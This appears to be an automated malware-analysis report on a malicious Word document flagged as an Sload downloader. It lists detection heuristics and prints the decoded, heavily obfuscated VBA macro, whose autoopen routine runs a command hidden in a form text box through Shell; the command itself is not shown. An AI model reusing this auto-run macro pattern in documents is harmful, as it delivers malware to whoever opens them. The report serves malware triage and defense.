MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine that calls the Shell() function. This function is used to execute external commands, specifically referencing cmd.exe and powershell.exe. The presence of these commands suggests the macro is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786421-0' further supports this downloader functionality.
Heuristics 10
-
ClamAV: Doc.Downloader.Sload-6786421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6786421-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set vsEtjZWGihjNAw = szBpiOwJhoploCXLYBqdokE Vbjmq = Array(FOJSrI, rIEHXK, GnwhVHd, Interaction.Shell(PZQhPpja, wEdGSVj), zVWtTwUn) Select Case LWYwskcctcUfMThhaIEjdGO -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() XGIXkjql -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12074 bytes |
SHA-256: e9bc705fa5cdd94efeaa9d0271cce1018cf1685dc38c763d03084042ac75bf12 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
321 of 370 identifiers look randomly generated (e.g. 'hLlJioKnbuFiiAEaHJtNEkhE') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kFGnNiu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
XGIXkjql
End Sub
Attribute VB_Name = "NJsijRPItM"
Function XGIXkjql()
On Error Resume Next
Select Case jENiIYSoZStofnwvwuDP
Case 295839247
VZwLlnSXcJuiHwAnWAFiw = cvCcJqvzABjvjnhzmiWCp
uAjzuJXCKOmkwBIJdcbdI = Log(uLOMFZNaHvusBCwLvmbwrVI)
rjodBuaLbAFUihDwokGqqEzG = 87755666
jpCKBZDQVZlkZNUiQ = wbcNicJHOSImhh
Case 105708589
OlJQzjRSLiNEKtVHnwKlp = 121366414
ZBuLkIjrDUqzjZA = Log(QKKBDOEwUwBwjX)
tvijPEUjKcnJjUtminwt = 176824770
QDLwzqoGkIjpwDFpkzvi = Log(ZQFUbbKTLndDPf)
End Select
Set YSGirDridtYqjsCwwwi = mFbWPinZUDmhYiRSqRmwhlb
Select Case aqWYRTEcPRXLFqslniN
Case 130445054
YGTLjDXsTvbpPlnpBGqdnoXH = YDJfIsULdBjCNhQhkwWv
pFEvlbXqJjjMiLANNL = Log(HdmjEmoZZwCsBM)
iwEjWRzVUSAqiVQ = 130250399
lTosDVAJzBwtGrhAcd = IiolJHRQDvJDJc
Case 210567273
iYNfcEZYPzbOaSq = 15238139
OKswiilmFwNnwpRakzcOwZE = Log(QVKfCplFHKuRnK)
tcsXIMlRKKoqTO = 262685026
oGojMTFjPLIfnuzmazilFCw = Log(fEAVOzRqTQGLwinaXIHzEFi)
End Select
Set KBQUjColKwBISjVPt = MWooovLHOwvwnZalL
Select Case wbGCZhObBTLTbzYjzzEdno
Case 276098678
kMCCdCcvjMcICfjzv = dhHKZNsAahrGCKloRNi
wwqQnPWPiRNEiOKI = Log(ZmpJdbvDZKSXNNWV)
airqXKqcWITnYnzdiraoC = 140095882
uMNEErREqizojQTCcz = HSbQBWSuiVwjjFHwiJFlk
Case 33703929
cEYwTMLpzpVOET = 314697569
imziiuBTjYTosWNw = Log(OzLcYwhWfwrKqC)
izXznWWiCEPusXzbbZMq = 131600269
jKnQLCwKIsVqFvzOJfrQJ = Log(IDoziXPliMJwNNLXKTm)
End Select
Set vWYCRCbNPjwDaLBjbMUYvXN = jGhlCmUYiQclfmhf
Select Case olijdptBzaPdKIjwM
Case 47894076
bBcZMimQHuOXiKSGUQKqz = QiYLjsmUiGCIXMMMRBqYmHj
jTsBLhBRijluAA = Log(udmLIUamFuHzJz)
FJwUfMzlJAFlZnbRLQz = 319197685
zvbjFjnGDisSHdbvfVpusdL = iAzddviJCjGNXl
Case 172231497
MfFRMTSJzVfvKBCVkYAE = 220545310
cHAjPbXOXuvJiNY = Log(qPipiHQnzAilczlVwDCzRdD)
mkzlzATpzrhkWriVrMjOzmm = 160028376
ZLiKabNLrDtJinz = Log(ookSAzGYhFEtptzwZcao)
End Select
Set iWPUYiolLNZkhIwBGIaFGd = WTWwDukCNKrKRVzbVS
Select Case hwuhTiRnVRKnvwPsZBomSi
Case 301924491
dwwhnPDKGPFXNuXd = ajfGuRfsSraInWwCkEUjjzFN
jjqsiidLnsCODihToVYdCTsH = Log(cqCuOaaSGNloAnMwzz)
wnhVnPvihkzNojXBoaRY = 118772876
wzUwiohLjETNKjvUPiT = thIAzFclYVfbMUrjBrkHzVDs
Case 306398701
YqFTLmFWiOoUwZLwnKY = 290116663
qpMTXtMwXiQFWh = Log(fFKtVqmdvhsLvAisTCZiB)
AnstYKkYOcsaQiAfWKDLQmf = 227003470
zplwDzwjlEWAcRbtX = Log(QTVkAsojOipdNIKca)
End Select
Set wbLitqfdifttcStTOP = NpsIXiUuIqNqArGuvHlafFWO
Const wEdGSVj = 0
Select Case kzTsThwliSGQENbUDjHZz
Case 275966991
uaYujWsnohZihfsskYnOAoCY = MHQFtJkuzZSvnPOp
SjfiuoKrWBKbzFYzfWPc = Log(uXpniGawzIYYVWTtjSTFN)
IZSBUuwHswNzXLprMi = 242947233
ZslCciEFwEwWTXPPUjmfAqQ = LYwHDrFkUTzQoQYlpqK
Case 260338468
qdAwaWfvEujbLr = 30218462
zCFzLCAawaEIAqJfdXVuw = Log(cVapPZNpcZTBroFo)
ndZzzRXvOkDwnVKllZjZWmb = 86738269
wfozzVaojhRZNdD = Log(tBoJqoDJPFPVPU)
End Select
Set CMoBmivPPdJGns = YvjWclmDSJbijtFE
Select Case LNfLmPfVRzECjGRmQPH
Case 318441265
JnEhzZsNQDlkRzpjJXIEZo = uzkJjriwQpnBabinqnHB
TSSHbGGswrOVJJkOQIWiGUud = Log(PEfkSQRnibiSBIkbERzYjRRu)
ZfkSpwXoKMBbHfawhah = 39080851
OzmGBDzFQznlLtlhUtdGirvi = wmWbwqjocKfwLn
Case 311316939
itOOqwmpPNhEzRWEDGE = 112471782
iSGEwjiFiIFifvwjUJA = Log(hLlJioKnbuFiiAEaHJtNEkhE)
WTWYXjwERtShzZIYudn = 23822336
DfqXYKQnvwijhIVoPD = Log(IiMHltKkloJGtAFS)
End Select
Set fAwYjRVwoAPRnkiacvsrXF = OafwmqkfcpjIPFmcNqKz
Select Case uGEuYHqrcOLcmhaETlQ
Case 282150924
YcvjuXNruXAArktHNL = QpQswrnhnLOGDzIV
JKikcAirKbuzhwGaFadI = Log(wsGqafjQwCjOPwChbnphB)
PtjFPIjwXfNuMRXuCUCaOZ = 75265258
RzDsdmnahIdNGUQXkzfDB = mlKhlUfaZphAoREnVl
Case 288103122
MDoJohEiqQuHhzKSiwASvH = 231526735
fFjwTwctMOHjwAtEQAkJva = Log(qGmFZkZrFTAdiAFLuo)
vTqbVhCwCuWasF = 251495373
rjqDInWBPwWKDLoqUvizAf = Log(YWoXzjtIXwKNiDkrI)
End Select
Set oLYKssqFjFwbmqMPShUQZSVo = OtwKnkDWCLUsNivjrCoLwKUB
Select Case vlFNKKdjnDVjiVoiWzsa
Case 139311483
vSfGQWAwcdzVNEAvzwwrIzV = dFPGqPKcHCpnhDt
iqasjNHjhaCtddk = Log(zYdKGuGMTUNKPNOuFoJRWdYP)
fYQNQwiSrpJZiAokOZOAzUTM = 50300160
pUSbUzOMbVpzCVisXYFUWo = hIDKOAKEEFcJJzQVJL
Case 145508498
SuPWsREzvGmSAzlSQpz = 79765165
QltaMYtHCvJAOCmth = Log(wvNJzTJIKNzFTLJIB)
WwjsLqtKdSmzzZj = 158671046
QDHnaQDOfJwbwq = Log(AdXklDkXPmprWNO)
End Select
Set WvItFuVwfcifjwjfbjw = CwnzjfrBkYjARlajpw
PZQhPpja = kFGnNiu.TextBox1 + aFIYE + DKPqQs + IINZCU + wdOvW + ffqObsia + YzZJqkYP + jiaDmP
Select Case qYPdAFBzOdVMnFmChlKCApDa
Case 218195593
bjvJzlJzPPLjtNilfwb = lZYsoljwwAVpwciREFfjCnq
qwrzYOJFzomBLDVMCN = Log(OtWnRiMhaSrpwi)
BqtlXiqQqHpcFB = 236408788
hokcdTLaOLjimHzoTK = iSQqUXdjfbFHjr
Case 340134372
ANGYhfTXMBIiiIAJ = 310523744
FAQwQEznfwIEArmwwbMmUzwt = Log(SPzzXbvMjlzuCzCYtzVO)
BQrmKZzIfGBWUzo = 1393311
IWMsUFnCvdKNazdiWRzHLN = Log(wDBfzXhANYDrwB)
End Select
Set jKDjOvnvFGYrwfpsi = UOoTaqiNdwpWHidGkoEbwGK
Select Case ljNTRqODGmXSflKkEYs
Case 340484786
luVzcUKwCXjUvrfanBiwsn = KOfsbjZkMbmzlrVp
DEDPowjtfJRWKAuzhL = Log(zcjSdmWsJsuiRMMvnkwVQ)
zvWHOCbsBDjmstTmacRFaAka = 342118283
zFGNjpRBdnwVYURR = qCfTTbBJVELVwKvHEEVlnTq
Case 137193759
QjqEDznJJuYUpidEENlGjic = 3035594
UPwfDWMKdCvLESGX = Log(oQWmOarjjGEOKlDp)
ihrdGXMKMbitzvfiUpLdaGp = 30039164
TQHvSRrVNjZjiitKcBwJnkKZ = Log(qwrMQcsmimGEOuKqXlMF)
End Select
Set lHSTwEqvLjFiQc = zJzGjtDvmFNGoSQwwT
Select Case FqWzoTCNZiRsZYrVAP
Case 231481445
qivFWJTwkptXLXvzjwakiKc = hljwRcJlHmhWvRbfzFcjlt
CdupBpzOjFHYkZVfHfHQ = Log(qYCOXvkZhsCoEhUWnHw)
XARntqFiaVEdcIL = 37386486
aitOpwMFjjsAITXLIBpGOVj = FzMoYLwVPiNdCthBFhJKMd
Case 115413548
hSUGVzdEwDJqmY = 214608939
jXldGuIPTnBhMWdchKG = Log(qpzPBJfwkqOjBka)
rnunJFnhzvsbZjJcRZitXV = 187530646
OJicZUjbvpktPTzkCRSFRDZD = Log(mPbCjRWLwYzaKIdPQjkwP)
End Select
Set wczrFDWfLkbvmFEY = YOiRuzKsIopAWoHSa
Select Case aCJtuUWdtfjZzNYRtHLuIQzJ
Case 146791933
GzSufVJECsbNURBDjlwJfoM = saDupKFAXAOZKzALQvL
pjntsFkLKNOSkqCESOOs = Log(bqUDcshlnskchmLnJBkatq)
mwoTzvsCjTrOpSqQ = 82713116
ZWUdpCEqQJMiSt = jiHnZjpvqEJqYWVSkXWTT
Case 270120083
GlPHfipCBzdIjjd = 258067520
kbiZjMjTuqcGvZRrZA = Log(KbJMBBHsuNljHk)
jrKjaZiolrMvGY = 79381543
KicdraOdXYUlFIHUW = Log(qZhqacbnYUoGBTiwbBiHLIc)
End Select
Set MBEzicksYOhmjTHABECu = QWACJhGpPjhwAdYYdFvkwh
Select Case zZjqOrFihwpmWKZChbREcDi
Case 61791753
fFWuLconvqssfEKOu = oizoCvEriVZRvrWYjmjkWTBz
UjJBXGpiHubTrDbqTwS = Log(iuBVHUYfKaUjwNiO)
qGOkiowvEsjItCVjlwZfouC = 226705778
YjZuViUNwdrDdwFE = CcpXQYzzMQIjFvEjaJI
Case 150613863
jNOuzZdfIAUaOr = 171173099
mHIawJNMiqhnXDmwiYTOacT = Log(VSEQnIrEinnCAvEZABQGrqIF)
YsqYLSJoIFiFwZVz = 193069074
kPkwmTtOZLMHiJw = Log(PQAfSUiNrqZUDc)
End Select
Set HOhYpdbFWiztzbBaUGuJEwzp = lWEvuYKwQFtzlIYnK
Select Case jiKzdGCdFNzCuMDlEAF
Case 249932939
BQREoHfvzCjwNwZzWhEHsz = wFMaESiUTHkiOtvpzWhGLSD
OdoiTAizEVUzcjbdVhNrd = Log(LDbsFkKqjiBiMaivB)
cmdsYvNSvEkdFLEwS = 237815393
bvtmNmqzzUAwZju = qmTffimpGGFYqaNIu
Case 269341881
XizPFhwQzvFKzKwOLzE = 182015728
IEjHjSHWHsEkGXjqXNwjOpuA = Log(INtMCIqNdOiTHZPrtpCBaqn)
XomGuiSKfMXENKFjO = 155135231
ICXPnipVzrzURadoNWjS = Log(vTnuBLdikSnCNiNAYwXENST)
End Select
Set rFdjVrNiFiNijUlXMmPY = SEvQooXMNhcAHDvh
Select Case AGuXFmGdRKChIzZzMwon
Case 189874031
RqzIXcaIpHoSFDzLdc = THCIcQcoLVzfvD
pDYzOdDJUvsptWwBTMmJ = Log(OiXruoOmrbtPbNwnf)
XPwhMjbjRMUiTItQ = 175234075
AFTpoWcTzZSICNnwPt = jWoQLWCSNIkWKnbma
Case 302428230
bbFsjBRJJGrUszAuwMoIS = 251124632
PLPDHVbbNFhSobd = Log(PtMsLWorWJtdal)
PpWphTzKoifdPLhLSVHYO = 40257755
ttXXhzbzBbTScSlvkSjYJjs = Log(jpzaISMXIvdwJwQMMki)
End Select
Set vsEtjZWGihjNAw = szBpiOwJhoploCXLYBqdokE
Vbjmq = Array(FOJSrI, rIEHXK, GnwhVHd, Interaction.Shell(PZQhPpja, wEdGSVj), zVWtTwUn)
Select Case LWYwskcctcUfMThhaIEjdGO
Case 194680047
DRcHjQVfdqGNPNYbhfG = FNRsujhWXRFIvVpSzVK
wAicbTKujFwbIEVp = Log(kNAjwHMlzSuXGbMUvaFioQaY)
qSUizqzASPHKczsVrdBQWZ = 193767480
GNiQLKTmbwHpsGzbvXnME = TaMIzmZIQQpkYmMi
Case 268726677
vVjfrCdkfaVwmRf = 319553437
DDCNhNTfrAHiKOMifQianiK = Log(MGwmSiXFbsJimuOIPAAC)
CULIPHBwVGVtXBaOjN = 84784112
CHSFhwkBaLmhHJKlniCW = Log(IFmolOsotjnnZTvCGa)
End Select
Set WzVKUnmOrobCKqGtBf = wirNjcztipOjjDjAW
Select Case uTsNiaIHhHEuHWPwwNpr
Case 19372808
PXjqFXTlMtCckUDY = iPXqwpJwWBCpuRcdjDVds
lovuLrfmvvXiGcfWQi = Log(riVQwSbazDQhuqNdiuE)
STkGGRQLAzJmmEAmQXzc = 232357975
fiiNcntwwcMEHYwOK = BQaBtdvqqaNKvbuAnBbs
Case 268927427
RBAhahwboBNUaSrdoASm = 322847630
llhlKGkwnRqYzZBMDO = Log(OlLzaAcJKNaaCfwPPAoXqqs)
wiCTSccwEsihaoGki = 327223111
jMqnsAJmMPqDXtwAvwI = Log(hldWKzRoatEpsPICFrJTIqQ)
End Select
Set NoKndnKmZGtwiUcviVLSK = LHkuuEppiqUvIW
Select Case ZtYhBIjSoIYjDoYbmwz
Case 272181507
HtDacTwJsRJCGQU = NUnizjDSsvhMWazJFSSAUG
olIvqPdwXElYdJKMapl = Log(hmmnRUAwowTVHvztokMCO)
KIkBTzvFrKiZrCwViWPjIYkQ = 118139832
KQYpdiTiciCQAABiHJmhE = vSGpnhplXUjlpihBjAGIZUTN
Case 149013514
iaQbdkdNVFjnultqG = 222367182
OLXAFcmbvXbzsTZDPUwr = Log(HbIcStFUPjNlhHDHZLwrIipu)
qUVhdVKqhGjPYnj = 216034026
jnNOLLVwpJzzrZm = Log(WcYjmlOCuzBTrAYP)
End Select
Set BBCjriJzlnLMrphz = CKKzUuYLTLJCEp
Select Case kODwPzfjawbbrKIpMJ
Case 34761921
DjBijjuzOzuLwWknsjNzubwH = JHdAHzJtZRDMUSfEiUdBQf
aUwjvFCciuwXcRzHzl = Log(XFjaYNiuMGUGWdmDf)
TNnWoVSXvDnlNfPz = 51383701
ttXSNLpVNnZtpOSwi = iAQLIASfGbsprYWXJlm
Case 5173724
chSHiwBNZSQBrS = 48425944
hlXAiEOdYwAXREjKdXCTzEdC = Log(RhIcozFOZbzPASYSp)
hziwVmGXTQoAdIUkQXGAk = 321977303
IschvdFiAIUvFlULWWQjpaY = Log(ruQBBMozlCVDsELuNmnsIMOw)
End Select
Set LjiTQFiTiqAMEdnTVKDPRTRL = SDnjpijSFpdKfUwnkO
Select Case CqjPqYibJQGKGiPmT
Case 333015729
MBKKJTZAIzOJHBHQJRRI = zaqsGLSihbzwrI
rfWwQXVbvGzJwOFUC = Log(cMbTRDIHSbYOLPttYiuVrd)
wvlGBTUbGwIPvnYNToJF = 305898656
jvjQFpbZjzwjcX = wGozzRRCAzFAQbhiXjvP
Case 274938944
lOfAjQJRLLAhWhVIul = 92889951
jSzoKwzQazhIqZUZSwlBtil = Log(zjFzNPoJBwoTOqqiRsqMdsq)
NvpwAMzAjFoatzDLLYGtkBKc = 56290762
kBsZQHtHmRasIo = Log(nmIBPpRofAFlwMLkNnwcwIGp)
End Select
Set hlMlkSPRwwOCasNSMNYKW = uahNFKMzfjTUhDECuipTAPzi
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.